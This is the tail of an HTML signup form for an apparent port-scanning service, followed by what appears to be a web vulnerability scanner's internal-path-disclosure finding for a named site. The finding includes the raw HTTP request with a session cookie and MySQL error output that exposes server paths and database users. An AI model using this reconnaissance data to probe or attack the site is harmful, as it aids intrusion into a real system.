<tr> <td><b>First Name: </b></td> <td colspan="2"><input type=text name='fname' id='fname' value=''><script type="text/javascript"> var fname = new LiveValidation("fname"); fname.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td width="384"></td> </tr> <tr> <td><b>Last Name: </b></td> <td colspan="2"><input type=text name='lname' id='lname' value=''><script type="text/javascript"> var lname = new LiveValidation("lname"); lname.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td></td> </tr> <tr> <td><b>Company: </b></td> <td colspan="2"><input type=text name='company' id='company' value=''></td> <td></td> </tr> <tr> <td><b>Address: </b></td> <td colspan="2"><input type=text name='address_1' id='address_1' value=''></td> <td></td> </tr> <tr> <td><b>City:</b></td> <td colspan="2"><input type=text name='city' id='city' value=''><script type="text/javascript"> var city = new LiveValidation("city"); city.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td></td> </tr> <tr> <td><b>Country:</b></td> <td colspan="2"><select name='cboCountry' id='cboCountry' onChange='Fill_States();'> <option selected='selected'>12345678901234567890</option> <option>temp</option> </select></td> <td></td> </tr> <tr> <td><b>State/Province:</b></td> <td colspan="2"><select name='cboState' id='cboState' onChange='Update_Globals();'> <option selected='selected'>12345678901234567890</option> <option>temp</option> </select></td> <td></td> </tr> <tr> <td><b>Zip:</b></td> <td colspan="2"><input type=text name='zip' id='zip' value=''></td> <td></td> </tr> <tr> <td><b>Phone: </b></td> <td colspan="2"><input type=text name='phone' id='phone' value=''><script type="text/javascript"> //var phone = new LiveValidation("phone");// phone.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td></td> </tr> <tr> <td><b>Cell Phone: </b></td> <td colspan="2"><input type=text name='cell_phone' id='cell_phone' value=''><script type="text/javascript"> //var phone = new LiveValidation("cell_phone"); //phone.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td></td> </tr> <tr> <td><b>Email: </b></td> <td colspan="3"><input type=text name='email' id='email' value=''><script type="text/javascript"> var email = new LiveValidation("email"); email.add(Validate.Email);</script> <br/><span class="smaller">All reports will be sent to this email address</span></td></tr> <tr> <td id ="uNameHint"><b>User Name:</b></td> <td colspan="3"><input type=text name='uName' id='uName' value='' onChange="checkUser(this.value)"> <br/><span class="smaller">This is the log in ID for your account</span></td> </tr> <tr> <td id ="passHint"><b>Password:</b></td> <td colspan="3"><input type=password name='email2' id='email2' value='' onChange="checkPass(this.value)"> <br/><span class="smaller">This is the password for your account</span></td> </tr> <tr> <td colspan="2"><div id="ccdc_set" style="visibility:visible"><b>Have CCDC Card? </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Yes<input type=radio name='ccdc' id='yes' value='yes' onClick="javascript:toggleDisplayCCDC();">&nbsp;&nbsp;No<input type=radio name='ccdc' id='no' value='no' onClick="javascript:toggleDisplayCCDC2();"> <br/><span class="smaller">Cyber Crime Defence Card</span> </div> </td> <td></td> </tr> <tr> <td>&nbsp;</td> <td><div id='ccdc_div' style="visibility:hidden"> Card Number: <input type=text name='card' id='card' value=''/> <!--<br/>Add Funds: &nbsp;&nbsp;&nbsp;&nbsp;<input type=text name='money' id='money' value='' />--> </div> </td> </tr> </td> </tr> <tr> <td> <!-- pass a session id to the query string of the script to prevent ie caching --><img src='../captcha/securimage_show.php?sid=a738d75a8646c6f4903f6e5fc6473e39' alt="CAPTCHA Image" id="image" /></td><td><input type="text" name="code" /></td></tr><tr><td><a href="#" onClick="document.getElementById('image').src = '../captcha/securimage_show.php?sid=' + Math.random(); return false">Reload Image</a></td><td>&nbsp; </td> </tr> <tr><td>&nbsp;</td></tr> <tr> <td><input type='submit' name='submit' id='submit' value='Create New User'></td> <td colspan="2"><div id=status></div> <td></td> </tr> <tr> <td colspan="4"><label> <input type="checkbox" name="terms" id="terms"> I agree to the <a href="terms.php" target=_blank>terms</a> of this site.</label> <script type="text/javascript"> var terms = new LiveValidation('terms'); terms.add(Validate.Acceptance ); </script> </td> </tr> </table></div></form><div style="top:250px; left:10px; position:absolute;"><input type="button" onClick="javascript:history.go(-1);" value="Back"/></div> <script type="text/javascript"> Fill_Country(); Fill_States(); document.form1.cboCountry.selectedIndex=239; Fill_States(); </script> <script type="text/JavaScript">var TFN='';var TFA='';var TFI='0';var TFL='0';var tf_RetServer="rt.trafficfacts.com";var tf_SiteId="15377gfaeb94703f60956b3814920288c4ebb12fed1bcah12";var tf_ScrServer=document.location.protocol+"//rt.trafficfacts.com/tf.php?k=15377gfaeb94703f60956b3814920288c4ebb12fed1bcah12;c=s;v=5";document.write(unescape('%3Cscript type="text/JavaScript" src="'+tf_ScrServer+'">%3C/script>'));</script><noscript><img src="http://rt.trafficfacts.com/ns.php?k=15377gfaeb94703f60956b3814920288c4ebb12fed1bcah12" height="1" width="1" alt=""/></noscript> </body> </html>
- /portscanner/biz/check_this_scan_status.php

/portscanner/biz/check_this_scan_status.php

http://www.untraceableemail.net/portscanner/biz/check_this_scan_status.php

Identified Internal Path(s)

/var/www/html/portscanner/biz/check_this_scan_status.php

Request

GET /portscanner/biz/check_this_scan_status.php HTTP/1.1
Referer: http://www.untraceableemail.net/portscanner/biz/index.php.bak
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:41:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2030
Connection: close
Content-Type: text/html; charset=UTF-8


<br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Access denied for user 'root'@'localhost' (using password: YES) in <b>/var/www/html/portscanner/biz/check_this_scan_status.php</b> on line <b>19</b><br /><br /><b>Warning</b>: mysql_select_db() [<a href='function.mysql-select-db'>function.mysql-select-db</a>]: Access denied for user 'apache'@'localhost' (using password: NO) in <b>/var/www/html/portscanner/biz/check_this_scan_status.php</b> on line <b>20</b><br /><br /><b>Warning</b>: mysql_select_db() [<a href='function.mysql-select-db'>function.mysql-select-db</a>]: A link to the server could not be established in <b>/var/www/html/portscanner/biz/check_this_scan_status.php</b> on line <b>20</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Access denied for user 'root'@'localhost' (using password: YES) in <b>/var/www/html/portscanner/biz/check_this_scan_status.php</b> on line <b>236</b><br /><br /><b>Warning</b>: mysql_select_db() [<a href='function.mysql-select-db'>function.mysql-select-db</a>]: Access denied for user 'apache'@'localhost' (using password: NO) in <b>/var/www/html/portscanner/biz/check_this_scan_status.php</b> on line <b>237</b><br /><br /><b>Warning</b>: mysql_select_db() [<a href='function.mysql-select-db'>function.mysql-select-db</a>]: A link to the server could not be established in <b>/var/www/html/portscanner/biz/check_this_scan_status.php</b> on line <b>237</b><br /><br /><b>Warning</b>: mysql_query() [<a href='function.mysql-query'>function.mysql-query</a>]: Access denied for user 'apache'@'localhost' (using password: NO) in <b>/var/www/html/portscanner/biz/check_this_scan_status.php</b> on line <b>242</b><br /><br /><b>Warning</b>: mysql_query() [<a href='function.mysql-query'>function.mysql-query</a>]: A link to the server could not be established in <b>/var/www/html/portscanner/biz/check_this_scan_status.php</b> on line <b>242</b><br />